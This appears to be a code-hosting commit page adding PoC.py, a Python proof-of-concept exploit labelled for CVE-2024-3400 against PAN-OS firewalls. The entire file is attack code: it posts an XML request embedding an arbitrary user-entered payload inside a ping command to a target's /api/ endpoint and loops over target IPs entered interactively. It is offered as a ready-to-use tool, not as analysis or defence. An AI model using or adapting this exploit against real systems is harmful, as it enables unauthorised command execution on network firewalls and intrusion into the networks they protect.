Projects STRLCPY CVE-2024-3400 Commits 0e4f4bef
🤬
  • ■ ■ ■ ■ ■ ■
    PoC.py
     1 +import requests
     2 + 
     3 +def exploit_firewall(target_ip, payload):
     4 + url = f"https://{target_ip}/api/"
     5 + 
     6 + data = f"""<?xml version="1.0" encoding="UTF-8"?>
     7 + <request>
     8 + <op cmd="test" />
     9 + <cmd code="ping">{payload}</cmd>
     10 + </request>"""
     11 + 
     12 + headers = {
     13 + "User-Agent": "PAN-OS-Exploit",
     14 + "Content-Type": "application/xml"
     15 + }
     16 + 
     17 + try:
     18 + response = requests.post(url, headers=headers, data=data, timeout=5)
     19 + 
     20 + response.raise_for_status()
     21 + 
     22 + if "Success" in response.text:
     23 + print("Exploited successfully!")
     24 + else:
     25 + print("Exploit failed.")
     26 + print("Response:")
     27 + print(response.text)
     28 + 
     29 + except requests.exceptions.RequestException as e:
     30 + print(f"Failed to exploit: {e}")
     31 + 
     32 +def main():
     33 + while True:
     34 + target_ip = input("Enter the IP address of the vulnerable PAN-OS firewall (or 'q' to quit): ")
     35 + if target_ip.lower() == 'q':
     36 + break
     37 + payload = input("Enter the payload to execute: ")
     38 + exploit_firewall(target_ip, payload)
     39 + 
     40 +if __name__ == "__main__":
     41 + main()
     42 + 
     43 + 
Please wait...
Page is in error, reload to recover